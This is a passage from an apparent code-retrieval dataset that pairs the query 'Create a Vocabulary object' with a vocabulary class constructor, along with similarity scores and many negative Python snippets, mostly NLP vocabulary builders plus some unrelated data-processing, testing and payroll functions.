total_act + 1 \n #ipdb.set_trace(context=20) \n if true_act_simple == pred_act_simple : ## Correct DA but wrong activities\n if not acts[true_act_simple]['detail'].get(true_act_detail)['part-wrong'] : \n acts[true_act_simple]['detail'].get(true_act_detail)['part-wrong'] = { \n pred_act_detail : 1 \n }\n else :\n if pred_act_detail in acts[true_act_simple]['detail'][true_act_detail]['part-wrong'] : \n acts[true_act_simple]['detail'][true_act_detail]['part-wrong'][pred_act_detail] += 1\n else : \n acts[true_act_simple]['detail'][true_act_detail]['part-wrong'][pred_act_detail] = 1\n\n else : ## All wrong \n if not acts[true_act_simple]['detail'].get(true_act_detail)['all-wrong'] : \n acts[true_act_simple]['detail'].get(true_act_detail)['all-wrong'] = {\n pred_act : 1 \n }\n else :\n if pred_act in acts[true_act_simple]['detail'][true_act_detail]['all-wrong'] : \n acts[true_act_simple]['detail'][true_act_detail]['all-wrong'][pred_act] += 1\n else :\n acts[true_act_simple]['detail'][true_act_detail]['all-wrong'][pred_act] = 1\n \n\n\n # Compare Slots\n true_frame_slot_values = {f'{k}={v}' for k, v in true_frame.get('slots', [])}\n pred_frame_slot_values = {f'{k}={v}' for k, v in pred_frame.get('slots', [])}\n \n if flag == 1 : ## if right DA, check slots \n if true_frame_slot_values == pred_frame_slot_values : ## perfect prediction made \n right_act_right_slot.add(idx)\n else : \n right_act_wrong_slot.add(idx)\n else :\n if true_frame_slot_values == pred_frame_slot_values : \n wrong_act_right_slot.add(idx)\n else :\n wrong_act_wrong_slot.add(idx)", "def test_unchanged_status_text(self):\n scale = \"count\"\n metric1 = dict(type=\"metric_type\",\n name=\"Metric\",\n unit=\"units\",\n scale=scale,\n recent_measurements=[dict(count=dict(value=0,\n status=\"near_target_met\")),\n dict(count=dict(value=42,\n status=\"near_target_met\"))])\n metric2 = dict(type=\"metric_type\",\n name=\"Metric\",\n unit=\"units\",\n scale=scale,\n recent_measurements=[dict(count=dict(value=5,\n status=\"target_met\")),\n dict(count=dict(value=10,\n status=\"target_not_met\"))])\n metric_notification_data1 = MetricNotificationData(metric1, self.data_model, \"status_long_unchanged\")\n metric_notification_data2 = MetricNotificationData(metric2, self.data_model, \"status_long_unchanged\")\n notification = Notification(self.report, [metric_notification_data1,\n metric_notification_data2], \"destination_uuid\", {})\n text = build_notification_text(notification)\n self.assertEqual(\n \"[Report 1](https://report1) has 2 metrics that are notable:\\n\\n\"\n \"* Metric has been yellow (near target met) for three weeks. Value: 42 units.\\n\"\n \"* Metric has been red (target not met) for three weeks. Value: 10 units.\\n\",\n text)", "def preprocess_one(workcalc):\n \n workcalc_name = workcalc.get_attrs()['_process_label']\n version_preproc_dict = workchain_preproc_and_viewer_info[workcalc_name]\n \n prefix = None\n reason = None\n \n for prefix_version in version_preproc_dict:\n n_calls = version_preproc_dict[prefix_version]['n_calls']\n retr_list_per_step = version_preproc_dict[prefix_version]['retrieved_files']\n \n # ---\n # check if number of calls matches\n if len(workcalc.get_outputs()) < n_calls:\n if reason is None:\n reason = \"Not all calculations started.\"\n continue\n \n # ---\n # check if all specified files are retrieved\n success = True\n for rlps in retr_list_per_step:\n calc_step, retr_list = rlps\n calc = workcalc.get_outputs()[calc_step]\n retrieved_files = calc.out.retrieved.get_folder_list()\n if not all(f in retrieved_files for f in retr_list):\n if reason is None:\n reason = \"Not all files were retrieved.\"\n success = False\n break\n if not success:\n continue\n \n # ---\n # check if the required parameter is there\n if 'req_param' in version_preproc_dict[prefix_version]:\n req_param, req_key = version_preproc_dict[prefix_version]['req_param']\n inp_dict = workcalc.get_inputs_dict()\n if not (req_param in inp_dict and req_key in inp_dict[req_param].dict):\n if reason is None:\n reason = \"Required parameter not existing.\"\n continue\n \n # ---\n # found match! \n prefix = prefix_version\n break\n \n if prefix is None:\n raise(Exception(reason))\n \n structure = workcalc.get_inputs_dict()[version_preproc_dict[prefix]['struct_label']]\n pk_numbers = [e for e in structure.get_extras() if e.startswith(prefix[:-1])]\n pk_numbers = [int(e.split('_')[1]) for e in pk_numbers if e.split('_')[1].isdigit()]\n pks = [e[1] for e in structure.get_extras().items() if e[0].startswith(prefix[:-1])]\n if workcalc.pk in pks:\n return\n nr = 1\n if len(pk_numbers) != 0:\n for nr in range(1, 100):\n if nr in pk_numbers:\n continue\n break\n structure.set_extra('%s_%d_pk'% (prefix, nr), workcalc.pk)", "def lf_abnormal_interp_with_spikes(report):\n if 'interpretation' in report.sections.keys():\n interpretation = report.sections['interpretation']\n interp_text = interpretation['text']\n return abnormal_interp_with_spikes(interp_text)\n elif 'summary' in report.sections:\n return abnormal_interp_with_spikes(report.sections['summary']['text'])\n elif 'findings' in report.sections: # fall back to look in the findings \n if 'summary' in report.sections['findings']: # fall back to look for a summary instead\n return abnormal_interp_with_spikes(report.sections['findings']['summary'])\n if 'impression' in report.sections['findings']:\n return abnormal_interp_with_spikes(report.sections['findings']['impression'])\n return ABSTAIN_VAL\n elif 'narrative' in report.sections: # fall back to look in the findings \n ky = 'narrative'\n if 'summary' in report.sections[ky]: # fall back to look for a summary instead\n return abnormal_interp_with_spikes(report.sections[ky]['summary'])\n if 'impression' in report.sections[ky]:\n return abnormal_interp_with_spikes(report.sections[ky]['impression'])\n # could try running on all of findings but would really need to check then\n \n return ABSTAIN_VAL \n else:\n return ABSTAIN_VAL", "def rel_errors(self):\n ped_entries = {m[\"patient\"]: m for m in self.pedigree}\n result = {}\n import_job = ImportVariantsBgJob.objects.filter(case_name=self.name).order_by(\n \"-date_created\"\n )\n if import_job and not import_job[0].bg_job.status == \"done\":\n return result\n\n try:\n variant_set = self.latest_variant_set\n if variant_set:\n for rel_stats in variant_set.variant_stats.relatedness.all():\n relationship = \"other\"\n if (\n ped_entries[rel_stats.sample1][\"father\"]\n == ped_entries[rel_stats.sample2][\"father\"]\n and ped_entries[rel_stats.sample1][\"mother\"]\n == ped_entries[rel_stats.sample2][\"mother\"]\n and ped_entries[rel_stats.sample1][\"father\"] != \"0\"\n and ped_entries[rel_stats.sample1][\"mother\"] != \"0\"\n ):\n relationship = \"sibling-sibling\"\n elif (\n ped_entries[rel_stats.sample1][\"father\"] == rel_stats.sample2\n or ped_entries[rel_stats.sample1][\"mother\"] == rel_stats.sample2\n or ped_entries[rel_stats.sample2][\"father\"] == rel_stats.sample1\n or ped_entries[rel_stats.sample2][\"mother\"] == rel_stats.sample1\n ):\n relationship = \"parent-child\"\n if (\n relationship == \"sibling-sibling\"\n and rel_stats.relatedness() < THRESH_SIBLING\n ) or (\n relationship == \"parent-child\" and rel_stats.relatedness() < THRESH_PARENT\n ):\n for sample in (rel_stats.sample1, rel_stats.sample2):\n result.setdefault(sample, []).append(\n (\n \"pedigree shows {} relation for {} and {} but variants show low degree \"\n \"of relatedness\"\n ).format(\n relationship,\n only_source_name(rel_stats.sample1),\n only_source_name(rel_stats.sample2),\n )\n )\n return result\n except SmallVariantSet.variant_stats.RelatedObjectDoesNotExist:\n return {}", "def diff_it(self):\n data = {}\n differ = difflib.Differ()\n first = self.first.data.keys()\n first.sort()\n second = self.second.data.keys()\n second.sort()\n # Save data differently if file was measured only in first, only\n # in second or in both reports\n for item in differ.compare(first, second):\n fil = item[2:]\n mode = item[:1]\n if mode == ' ':\n data[fil] = [self.first.data[fil], self.second.data[fil]]\n elif mode == '+':\n data[fil] = [None, self.second.data[fil]]\n elif mode == '-':\n data[fil] = [self.first.data[fil], None]\n return collections.OrderedDict(sorted(data.items()))", "def _consist_numeric(col, _df1, _df2, _key1, _key2, img_dir, date_flag=False):\n\n df1, df2 = _df1.copy(), _df2.copy()\n df = pd.merge(df1, df2, left_on=_key1, right_on=_key2, how=\"inner\")\n\n if (df['%s_x' %(col)].dropna().shape[0] == 0) or (df['%s_y' %(col)].dropna().shape[0] == 0):\n if (df['%s_x' %(col)].dropna().shape[0] == 0) and (df['%s_y' %(col)].dropna().shape[0] == 0):\n error_msg = 'all nan in both table'\n elif df['%s_x' %(col)].dropna().shape[0] == 0:\n error_msg = 'all nan in table1'\n else:\n error_msg = 'all nan in table2'\n return {'column': col, 'error_msg': error_msg}\n\n df = df.dropna(how='any', subset=['%s_x' % (col), '%s_y' % (col)]).reset_index(drop=True)\n df['diff_temp'] = df['%s_y' %(col)] - df['%s_x' %(col)]\n corr = round(spearmanr(df['%s_x' %(col)].values, df['%s_y' %(col)].values)[0], 3)\n\n output = [\n {'feature': 'column', 'value': col, 'graph': 'consistency check'},\n {'feature': 'corr', 'value': corr},\n {'feature': 'min diff', 'value': round(df['diff_temp'].min(), 3)},\n {'feature': 'mean diff', 'value': round(df['diff_temp'].mean(), 3)},\n {'feature': 'median diff', 'value': round(df['diff_temp'].median(), 3)},\n {'feature': 'max diff', 'value': round(df['diff_temp'].max(), 3)},\n ]\n\n draw_values = df['diff_temp'].dropna().values\n origin_value_4 = [np.min(draw_values), np.mean(draw_values), np.median(draw_values), np.max(draw_values)]\n\n # get distribution\n scale_flg = 0\n draw_value_4 = origin_value_4\n if np.max([abs(origin_value_4[0]), abs(origin_value_4[3])]) >= pow(10, 6):\n scale_flg = 1\n draw_values, draw_value_4 = _get_scale_draw_values(draw_values, draw_value_4)\n\n # draw the scatter plot\n both_min = np.min([df['%s_x' %(col)].min(), df['%s_y' %(col)].min()])\n both_max = np.max([df['%s_x' %(col)].max(), df['%s_y' %(col)].max()])\n\n dpi = 72\n plt.figure(figsize=(635. / dpi, 635. / (9. / 4.) / dpi), dpi=dpi)\n plt.subplot(121)\n plt.title('Scatter plot for values')\n plt.scatter(df['%s_x' %(col)].values, df['%s_y' %(col)].values, c=TABLE1_DARK, s=5)\n plt.plot([both_min, both_max], [both_min, both_max], '--', c='#bbbbbb')\n\n plt.xlim(both_min, both_max)\n plt.ylim(both_min, both_max)\n\n ax2 = plt.subplot(122)\n if len(np.unique(draw_values)) <= 10:\n sns.countplot(draw_values, palette=sns.color_palette([TABLE2_DARK]))\n if len(np.unique(draw_values)) > 5:\n plt.xticks(rotation=90)\n else:\n sns.distplot(draw_values, color=TABLE2_DARK)\n y_low, y_up = ax2.get_ylim()\n _draw_texts(text_values=origin_value_4, draw_value_4=draw_value_4, mark=1, y_low=y_low, y_up=y_up)\n\n if date_flag:\n plt.title('Distribution of differences (in months)')\n elif scale_flg:\n plt.title('Distribution of differences (log10 scale)')\n else:\n plt.title('Distribution of differences')\n\n # save the graphs\n # adjust graph name\n graph_name = col\n if '/' in graph_name:\n graph_name = graph_name.replace('/', '')\n plt.savefig(os.path.join(img_dir, graph_name + '.png'), transparent=True, dpi=dpi)\n return {'column': col, 'result_df': pd.DataFrame(output), 'corr': {'column': col, 'corr': corr}}", "def compute_advice(self):\n for advice in self:\n old_lines = self.env['hr.payroll.advice.line'].search([('advice_id', '=', advice.id)])\n if old_lines:\n old_lines.unlink()\n payslips = self.env['hr.payslip'].search([('date_from', '<=', advice.date), ('date_to', '>=', advice.date), ('state', '=', 'done')])\n for slip in payslips:\n if not slip.sudo().employee_id.bank_account_id and not slip.sudo().employee_id.bank_account_id.acc_number:\n raise UserError(_('Please define bank account for the %s employee') % (slip.employee_id.name,))\n payslip_line = self.env['hr.payslip.line'].search([('slip_id', '=', slip.id), ('code', '=', 'NET')], limit=1)\n if payslip_line:\n self.env['hr.payroll.advice.line'].create({\n 'advice_id': advice.id,\n 'name': slip.sudo().employee_id.bank_account_id.acc_number,\n 'ifsc_code': slip.sudo().employee_id.bank_account_id.bank_bic or '',\n 'employee_id': slip.employee_id.id,\n 'bysal': payslip_line.total\n })\n slip.advice_id = advice.id" ]
[ "0.5009308", "0.50050104", "0.47927547", "0.47090858", "0.4646092", "0.46367276", "0.4600246", "0.45939845", "0.4547362", "0.45332745", "0.45131713", "0.45066488", "0.44925582", "0.44843617", "0.44840214", "0.4477567", "0.4472213", "0.44629148", "0.4452782", "0.4435036", "0.44328246", "0.44308645", "0.44265833", "0.4421612", "0.44146124", "0.4413403", "0.4410658", "0.44066277", "0.4400675", "0.43965662", "0.43781736", "0.43699896", "0.43698013", "0.43590617", "0.43502194", "0.4350029", "0.43460575", "0.43427908", "0.4332767", "0.4331764", "0.43228325", "0.4321928", "0.43122923", "0.43089813", "0.43023753", "0.4300798", "0.43000132", "0.4298905", "0.42902955", "0.42810413", "0.4279823", "0.42770475", "0.42768544", "0.4275416", "0.4269213", "0.42691246", "0.42684186", "0.42681015", "0.4267813", "0.4267813", "0.42658833", "0.42568272", "0.4253994", "0.4251924", "0.42514658", "0.42436707", "0.42415765", "0.42327845", "0.42259216", "0.42256454", "0.42240167", "0.42184362", "0.42133504", "0.42113551", "0.42102885", "0.4208856", "0.41949108", "0.41949108", "0.41930157", "0.41922373", "0.41910413", "0.41871935", "0.41834024", "0.41822806", "0.4178193", "0.4178075", "0.41760555", "0.41748223", "0.41744244", "0.4172829", "0.41689974", "0.41668284", "0.41653827", "0.41613853", "0.4157697", "0.41568294", "0.41426092", "0.41405603", "0.41349748", "0.4133247" ]
0.5701247
0
Create a Vocabulary object.
def __init__(self, max_size=None, lower=True, unk_token=True, remove_stopwords=False, specials=('<pad>',)): self._max_size = max_size self._lower = lower self._unk = unk_token self.token2id = {token: i for i, token in enumerate(specials)} self._id2token = list(specials) self._token_count = Counter() self.can_remove_stopwords=remove_stopwords self.num_docs = 0 self.num_pos = 0 self.num_nnz = 0 self.corpus=None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def vocab():\n symbols = DEFAULT_SPECIAL_SYMBOLS + [\"mouse\", \"dog\", \"tree\"]\n return Vocabulary(symbols)", "def from_dict(cls, dikt: dict) -> 'Vocabulary':\n return util.deserialize_model(dikt, cls)", "def create_vocab(vocab_path='ORBvoc-synth.txt'):\n total_time = 10 # seconds\n num_frames = 20\n speed = 3.0\n vocab_builder = VocabularyBuilder()\n for seed in tqdm(range(100), total=100):\n image_builder = DemoImageBuilder(\n mode=ImageMode.MONOCULAR, seed=seed,\n length=total_time * speed\n )\n for idx in range(num_frames):\n time = total_time * idx / num_frames\n image = image_builder.create_frame(time)\n vocab_builder.add_image(image.pixels)\n vocab_builder.build_vocabulary(str(vocab_path))", "def create(self, vocabulary=list) -> dict:\n try:\n out = {}\n for i in range(len(vocabulary)):\n out[vocabulary[i]] = i\n return(out)\n except Exception as error:\n print(f\"Error: self.create([...]) -> {error}\")", "def create_vocab(\n self,\n instance_datasets: Iterable[InstanceDataset],\n config: Optional[VocabularyConfiguration] = None,\n ) -> Vocabulary:\n # The transformers feature comes with its own vocab, no need to create anything if it is the only feature\n if self.config.features.configured_namespaces == [\n TransformersFeatures.namespace\n ]:\n return self.vocab\n\n self._check_for_word_vector_weights_file()\n\n config = config or VocabularyConfiguration()\n\n vocab = Vocabulary.from_instances(\n instances=(\n instance for dataset in instance_datasets for instance in dataset\n ),\n max_vocab_size=config.max_vocab_size,\n min_count=config.min_count,\n pretrained_files=config.pretrained_files,\n only_include_pretrained_words=config.only_include_pretrained_words,\n min_pretrained_embeddings=config.min_pretrained_embeddings,\n tokens_to_add=config.tokens_to_add,\n )\n\n # If the vocab is the same, this is just a no-op\n self._model.extend_vocabulary(vocab)\n\n return vocab", "def create_vocabulary(vocabulary_path, json_vocab_path):\n if not gfile.Exists(vocabulary_path):\n print(\"Transform vocabulary to %s\" % vocabulary_path)\n with gfile.GFile(json_vocab_path, mode=\"rb\") as f:\n jvocab = json.load(f)\n vocab = jvocab['w2id']\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")", "def make_vocab(corpus_dictionary, vocab_path):\n with open(vocab_path, 'wb') as fout:\n pickle.dump(corpus_dictionary, fout)\n print('Saved dictionary to', vocab_path)", "def load(cls, path: str) -> 'Vocab':\n with open(path, 'r', encoding='utf-8') as f:\n return cls.from_json(f.read())", "def vocabulary(self, config=Config()):\n raise NotImplementedError(\"Class %s doesn't implement vocabulary()\" % self.__class__.__name__)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if os.path.exists(vocabulary_path):\n rev_vocab = []\n with codecs_open(vocabulary_path, \"rb\", encoding=\"utf-8\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [tf.compat.as_bytes(line.strip()) for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def __init__(self, vocabulary_size=1000):\n self.vocabulary_size = vocabulary_size", "def create_vocabulary(sentences, path):\n print('creating vocab..')\n\n word_dict = dict(); vocabulary = dict()\n for sentence in sentences:\n for word in nltk.word_tokenize(sentence):\n if word not in word_dict:\n word_dict[word] = ''\n word_dict['<s>'] = ''\n word_dict['</s>'] = ''\n\n with open(path, encoding=\"utf8\") as f:\n for line in f:\n word, vec = line.split(' ', 1)\n if word in word_dict:\n vocabulary[word] = np.fromstring(vec, sep=' ')\n\n print('vocabulary was created successfully!')\n return vocabulary", "def _create_vocab(captions):\n print(\"Creating vocabulary.\")\n min_word_count = 4\n word_counts_output_file = '/Users/lzg/Desktop/image_caption/word_count.txt'\n counter = Counter()\n for c in captions:\n counter.update(c)\n print(\"Total words:\", len(counter))\n\n # Filter uncommon words and sort by descending count.\n word_counts = [x for x in counter.items() if x[1] >= min_word_count]\n word_counts.sort(key=lambda x: x[1], reverse=True)\n print(\"Words in vocabulary:\", len(word_counts))\n\n # Write out the word counts file.\n with tf.gfile.FastGFile(word_counts_output_file, \"w\") as f:\n f.write(\"\\n\".join([\"%s %d\" % (w, c) for w, c in word_counts]))\n print(\"Wrote vocabulary file:\", word_counts_output_file)\n\n # Create the vocabulary dictionary.\n reverse_vocab = [x[0] for x in word_counts]\n unk_id = len(reverse_vocab)\n vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])\n # vocab = Vocabulary(vocab_dict, unk_id)\n\n return vocab_dict, unk_id", "def getVocabulary(self): # real signature unknown; restored from __doc__\n pass", "def load(cls, w2v_vocab):\n n2v_vocab = cls()\n for key, value in w2v_vocab.__dict__.items():\n setattr(n2v_vocab, key, value)\n return n2v_vocab", "def getVocabulary(vocabulary_id):\n relex_web = getSite().restrictedTraverse('relex_web')\n key = KEY_STORAGE + \".\" + vocabulary_id\n vocabulary = json.loads(getattr(relex_web, key, \"[]\"))\n return vocabulary", "def from_list(texts, max_size=None, min_freq=None, tokenizer=None):\n \n if tokenizer is None:\n tokenizer = Preprocess([\n Consecutive(),\n RemoveEmoji(),\n WordTokenizer()\n ])\n\n vocab = Vocabulary(\n max_size=max_size,\n min_freq=min_freq)\n\n token_lst = tokenizer(texts)\n vocab.build_vocab(token_lst)\n\n return vocab", "def create_vocab(input_iter, min_frequency):\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(\n FLAGS.max_sentence_len,\n min_frequency=min_frequency,\n tokenizer_fn=tokenizer_fn)\n\n vocab_processor.fit(input_iter)\n return vocab_processor", "def create_vocabulary(vocabulary_path, data_paths, max_vocabulary_size,\n tokenizer=None, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n vocab = {}\n files = []\n files += [data_paths+f for f in os.listdir(data_paths) ]\n for one_file in files:\n with gfile.GFile(one_file, mode=\"rb\") as f:\n review = f.read()\n tokens = tokenizer(review) if tokenizer else character_tokenizer(review)\n for w in tqdm(tokens):\n word = _DIGIT_RE.sub(b\"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")\n else:\n print(\"Vocabulary already created.\")", "def _load_vocab(vocab_file_name, language):\n vocab = []\n vocab_size = 0\n #with codecs.getreader(\"utf-8\")(tf.gfile.GFile(vocab_file_name), \"rb\") as f:\n with tf.gfile.GFile(vocab_file_name) as f:\n for word in f:\n vocab.append(word.strip())\n vocab_size += 1\n\n if not EOS in vocab:\n vocab = [EOS] + vocab\n if not SOS in vocab:\n vocab = [SOS] + vocab\n if not UNK in vocab:\n vocab = [UNK] + vocab\n\n reverse_dictionary = {}\n new_vocab_file_name = vocab_file_name + \".new\"\n with tf.gfile.GFile(new_vocab_file_name, \"wb\") as f:\n reverse_dictionary = {}\n i = 0\n for word in vocab:\n f.write(\"%s\\n\" % word)\n reverse_dictionary.update({i : word})\n i+=1\n\n vocab_table = tf.contrib.lookup.index_table_from_file(new_vocab_file_name, default_value = 0)\n\n eos_id_tensor = tf.cast(vocab_table.lookup(tf.constant(EOS)), tf.int32)\n sos_id_tensor = tf.cast(vocab_table.lookup(tf.constant(SOS)), tf.int32)\n\n return Vocab(lang=language,\n table=vocab_table,\n size=vocab_size,\n reverse_dict=reverse_dictionary,\n sos_id_tensor=sos_id_tensor,\n eos_id_tensor=eos_id_tensor)", "def load_vocab(fn):\n return corpora.Dictionary.load(fn)", "def create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"rb\") as f:\n counter = 0\n for line in f:\n counter += 1\n if counter % 100000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, b\"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n print(\"vocab too big\")\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")", "def deserialize(self, descriptor: Dict, data: List) -> ObjectHandle:\n return VocabularyHandle(\n values=set(data),\n name=descriptor['name'],\n namespace=descriptor['namespace'],\n label=descriptor.get('label'),\n description=descriptor.get('description')\n )", "def create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=True,\n _DIGIT_RE=re.compile(br\"\\d\"),\n _START_VOCAB=[b\"_PAD\", b\"_GO\", b\"_EOS\", b\"_UNK\"]):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"rb\") as f:\n counter = 0\n for line in f:\n counter += 1\n if counter % 100000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, b\"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")\n else:\n print(\"Vocabulary %s from data %s exists\" % (vocabulary_path, data_path))", "def create_restricted_vocabulary(field, options,\n message_factory=None,\n restricted=lambda x: True):\n class GeneratedVocabulary(object):\n\n @property\n def option_level_mapping(self):\n option_level_mapping = [list(a) for a in self.options[:]]\n option_level_mapping = dict([a for a in option_level_mapping\n if not a.reverse()])\n return option_level_mapping\n\n @property\n def option_names(self):\n return [a[1] for a in self.options]\n\n @property\n def options(self):\n if callable(self._options):\n return self._options()\n else:\n return self._options\n\n def __call__(self, context):\n self.context = context\n\n terms = []\n for name in self.get_allowed_option_names():\n title = name\n if message_factory:\n title = self._(name)\n terms.append(\n zope.schema.vocabulary.SimpleTerm(name, title=title))\n return zope.schema.vocabulary.SimpleVocabulary(terms)\n\n def get_allowed_option_names(self):\n acquisition_value = self._get_acquisiton_value()\n\n if not self.restricted():\n return self.option_names\n\n if not acquisition_value or acquisition_value not in self.option_names:\n return self.option_names\n\n allowed_option_names = []\n allowed_option_names.append(acquisition_value)\n allowed_level = self.option_level_mapping[acquisition_value] + 1\n for level, name in self.options:\n if level >= allowed_level:\n allowed_option_names.append(name)\n\n return allowed_option_names\n\n def _get_acquisiton_value(self):\n context = self.context\n if isinstance(context, MetadataBase) or context is None:\n # we do not test the factory, it is not acquisition wrapped and\n # we cant get the request...\n return None\n request = self.context.REQUEST\n # XXX CHANGED FROM PATH_TRANSLATED TO PATH_INFO\n # because the test don't work\n if '++add++' in request.get('PATH_INFO', ''):\n # object is not yet existing, context is container\n obj = context\n else:\n # object is existing, container is parent of context\n obj = context.aq_inner.aq_parent\n while not ISiteRoot.providedBy(obj):\n try:\n return self.field.get(obj)\n except AttributeError:\n try:\n interface_ = self.field.interface\n except AttributeError:\n pass\n else:\n try:\n adpt = interface_(obj)\n except TypeError:\n # could not adapt\n pass\n else:\n return self.field.get(adpt)\n obj = obj.aq_inner.aq_parent\n return self.field.default\n\n GeneratedVocabulary.field = field\n GeneratedVocabulary._options = options\n GeneratedVocabulary._ = message_factory\n GeneratedVocabulary.restricted = restricted\n\n return GeneratedVocabulary", "def create_vocabulary(vocabulary_path, words, max_vocabulary_size, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s with max size %d\" % (vocabulary_path, max_vocabulary_size))\n vocab = {}\n counter = 0\n for w in words:\n counter += 1\n if counter % 10000 == 0:\n print(\" processing word %d = %s\" % (counter, w))\n word = re.sub(_DIGIT_RE, \"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"w\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + \"\\n\")", "def initialize_vocabulary(vocabulary_path):\n characters_class = 9999\n\n if os.path.exists(vocabulary_path):\n with codecs.open(vocabulary_path, 'r', encoding='utf-8') as voc_file:\n rev_vocab = [line.strip() for line in voc_file]\n\n vocab = {x: y for (y, x) in enumerate(rev_vocab)}\n\n reserved_char_size = characters_class - len(rev_vocab)\n if reserved_char_size < 0:\n raise ValueError(\"Number of characters in vocabulary is equal or larger than config.characters_class\")\n\n for _ in range(reserved_char_size):\n rev_vocab.append('')\n\n # put space at the last position\n vocab[' '] = len(rev_vocab)\n rev_vocab.append(' ')\n return vocab, rev_vocab\n\n raise ValueError(\"Initializing vocabulary ends: %s\" % vocabulary_path)", "def create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"r\") as f:\n counter = 0\n for line in f:\n counter += 1\n line = line.strip().split('\\t')[0]\n if counter % 100000 == 0:\n print(\" processing line %d\" % counter)\n 